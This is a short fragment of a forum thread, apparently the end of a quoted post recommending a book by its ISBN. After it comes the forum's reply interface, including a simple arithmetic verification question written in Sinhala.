[B]ISBN[/B] 0321304543 happy reading. [/QUOTE]
Insert quotes…
Verification
Hath warak paha keeyada? (hatha wadikireema paha)
Post reply
Top
Bottom